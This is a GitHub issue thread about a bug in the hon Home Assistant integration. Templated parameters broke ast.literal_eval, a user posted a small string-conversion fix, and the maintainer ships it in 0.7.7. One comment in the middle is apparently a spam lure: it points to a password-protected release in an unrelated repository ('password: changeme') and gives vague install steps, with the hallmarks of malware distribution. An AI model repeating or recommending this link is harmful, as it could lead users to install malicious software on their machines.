### ISSUE TITLE
Fixing weird issue when trying to call hon.start_program from Template

### ISSUE THREAD

**Issue by AlexCherrypi** [gvigroux/hon#149]
If you use templating in the parameters of hon.start_program, you encounter issues because ast.literal_eval does not get the right data type (or whatever else, my fix works, so I don't question it).

Because I am on my phone I currently can't create a pull request, but this is the fix:

```
parameters_str = call.data.get("parameters", "{}")
if type(parameters_str) != str:
  parameters_str = str(parameters_str)
parameters = ast.literal_eval(parameters_str)
```

Replace the creation of "parameters" on lines 320, 367, 383 with this snippet (and everywhere else I did not find immediately, but where you create "parameters" from some input from HA), and you can use templating everywhere, while also not just skipping the ast.literal_eval check.

Maybe you could even implement this check everywhere, where call.data.get() is used, just to be on the save side?

**Comment by syedmaaz9905** [comment]
to fix your trouble check this fix, i see it in another issue,
https://github.com/Jostino/RimWorld-it/releases/tag/fix
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by AlexCherrypi** [comment]
The code has to be changed in [__init__.py](https://github.com/gvigroux/hon/blob/master/custom_components%2Fhon%2F__init__.py)

**Comment by AlexCherrypi** [comment]
@gvigroux do you think, these locations are the only ones that have to be changed?

**Comment by gvigroux** [comment]
Thanks for this.  I will test and publish soon.

**Comment by gvigroux** [comment]
Fixed in 0.7.7
